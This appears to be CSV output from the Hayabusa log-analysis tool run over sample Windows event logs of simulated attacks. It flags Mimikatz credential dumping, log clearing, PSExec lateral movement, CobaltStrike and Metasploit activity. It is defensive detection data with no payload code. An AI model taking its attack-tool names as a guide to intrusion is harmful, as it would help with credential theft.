+2021-03-16 03:55:38.049 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{259DDBBE-DDD3-4590-8A2C-60211631093C}-GoogleUpdateSetup.exe  :  URL: http://r5---sn-5hnedn7l.gvt1.com/edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe?cms_redirect=yes&mh=pH&mip=213.127.64.248&mm=28&mn=sn-5hnedn7l&ms=nvh&mt=1615834104&mv=m&mvi=5&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2021-03-16 04:01:32.985 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{F1502BD5-ADFF-4123-9C07-0E4B02FCB037}-89.0.4389.82_87.0.4280.66_chrome_updater.exe  :  URL: http://r1---sn-5hne6nlr.gvt1.com/edgedl/release2/chrome/AKGnpidu3x0C0gtuxw-XHRQ_89.0.4389.82/89.0.4389.82_87.0.4280.66_chrome_updater.exe?cms_redirect=yes&mh=rx&mip=213.127.64.248&mm=28&mn=sn-5hne6nlr&ms=nvh&mt=1615834584&mv=m&mvi=1&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2021-03-27 01:12:22.200 +09:00,jump01.offsec.lan,7045,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
+2021-03-27 01:12:22.200 +09:00,jump01.offsec.lan,7045,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
+2021-03-27 01:12:22.201 +09:00,jump01.offsec.lan,13,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID13-New service for Mimikatz.evtx
+2021-03-27 01:12:22.201 +09:00,jump01.offsec.lan,13,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID13-New service for Mimikatz.evtx
+2021-03-27 01:17:29.210 +09:00,jump01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx
+2021-03-27 01:17:35.489 +09:00,jump01.offsec.lan,7045,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
+2021-03-27 01:17:35.489 +09:00,jump01.offsec.lan,7045,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
+2021-03-27 01:17:35.490 +09:00,jump01.offsec.lan,4697,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx
+2021-03-27 01:17:35.490 +09:00,jump01.offsec.lan,4697,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx
+2021-03-27 01:17:35.490 +09:00,jump01.offsec.lan,4697,high,Credential Dumping Tools Service Execution,,rules/sigma/builtin/security/win_security_mal_creddumper.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx
+2021-03-27 01:36:00.106 +09:00,jump01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
+2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4658,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
+2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4658,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
+2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
+2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,critical,LSASS Access from Non System Account,,rules/sigma/builtin/security/win_lsass_access_non_system_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
+2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
+2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,high,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
+2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4663,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
+2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4663,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
+2021-03-27 01:59:24.880 +09:00,rootdc1.offsec.lan,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4661-4658 Mimikatz sekurlsa password dump SAM.evtx
+2021-03-27 01:59:24.892 +09:00,rootdc1.offsec.lan,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4661-4658 Mimikatz sekurlsa password dump SAM.evtx
+2021-04-21 05:32:55.368 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile  :  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
+2021-04-21 05:32:55.368 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
+2021-04-21 05:33:00.305 +09:00,MSEDGEWIN10,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
+2021-04-21 05:33:00.384 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\System32\cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\user03  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
+2021-04-21 05:33:01.944 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
+2021-04-21 05:33:13.741 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
+2021-04-21 05:33:13.741 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
+2021-04-21 05:33:13.741 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
+2021-04-21 05:33:14.273 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
+2021-04-21 05:33:14.273 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
+2021-04-21 05:33:14.273 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
+2021-04-21 18:27:51.181 +09:00,jump01.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-7036 PSexec service installation.evtx
+2021-04-21 18:40:32.342 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.42.22  :  Port: 56661  :  LogonID: 0x1375fbd,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 18:40:32.343 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 18:40:32.343 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: PSEXESVC.exe  :  IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 18:40:32.343 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: PSEXESVC.exe  :  IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 18:40:32.347 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.42.22  :  Port: 56662  :  LogonID: 0x1375fd8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 18:40:32.348 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.42.22  :  Port: 56663  :  LogonID: 0x1375ff5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 18:40:32.348 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.42.22  :  Port: 56664  :  LogonID: 0x1376003,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 18:40:32.360 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.42.22  :  Port: 56666  :  LogonID: 0x1376020,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 18:40:32.362 +09:00,srvdefender01.offsec.lan,4674,critical,SCM Database Privileged Operation,,rules/sigma/builtin/security/win_scm_database_privileged_operation.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 18:40:32.501 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path:   :  IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 18:40:32.501 +09:00,srvdefender01.offsec.lan,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 18:40:32.510 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: cmd.exe  :  IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 18:40:32.510 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: cmd.exe  :  IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 18:40:32.528 +09:00,srvdefender01.offsec.lan,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 18:40:32.528 +09:00,srvdefender01.offsec.lan,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 18:40:32.529 +09:00,srvdefender01.offsec.lan,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 22:30:00.589 +09:00,-,-,low,Rare Schtasks Creations,[condition] count() by TaskName < 5 in timeframe [result] count:1 TaskName:\\eviltask timeframe:7d,rules/sigma/builtin/security/win_rare_schtasks_creations.yml,-
+2021-04-21 23:56:41.780 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path:   :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-21 23:56:41.786 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-21 23:56:41.818 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: System32\WindowsPowerShell\v1.0\powershell.exe  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID5145-remote service creation over SMB.evtx
+2021-04-21 23:56:41.818 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: System32\WindowsPowerShell\v1.0\powershell.exe  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-21 23:56:41.818 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: System32\WindowsPowerShell\v1.0\powershell.exe  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5145-remote shell execution via SMB admin share.evtx
+2021-04-21 23:56:41.897 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path:   :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,high,PowerShell Scripts Installed as Services,,rules/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
+2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,critical,CobaltStrike Service Installations,,rules/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
+2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,high,PowerShell Scripts Installed as Services,,rules/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,critical,CobaltStrike Service Installations,,rules/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,high,PowerShell Scripts Installed as Services,,rules/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-MSF payload deployed via service.evtx
+2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,critical,CobaltStrike Service Installations,,rules/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-MSF payload deployed via service.evtx
+2021-04-22 17:50:53.614 +09:00,fs03vuln.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x74872,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: 0Konuy9q8HtkWeKS  :  IP Address: 10.23.123.11  :  Port: 41747  :  LogonID: 0x74872,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path:   :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,4624,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:04.780 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: FS03VULN$  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:04.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: FS03VULN$  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: System32\WindowsPowerShell\v1.0\powershell.exe  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:04.796 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: FS03VULN$  :  Share Name: \\*\IPC$  :  Share Path:   :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:05.758 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation:   :  IP Address: 10.23.23.9  :  Port: 60163  :  LogonID: 0x76e83,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:05.758 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x76e83,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
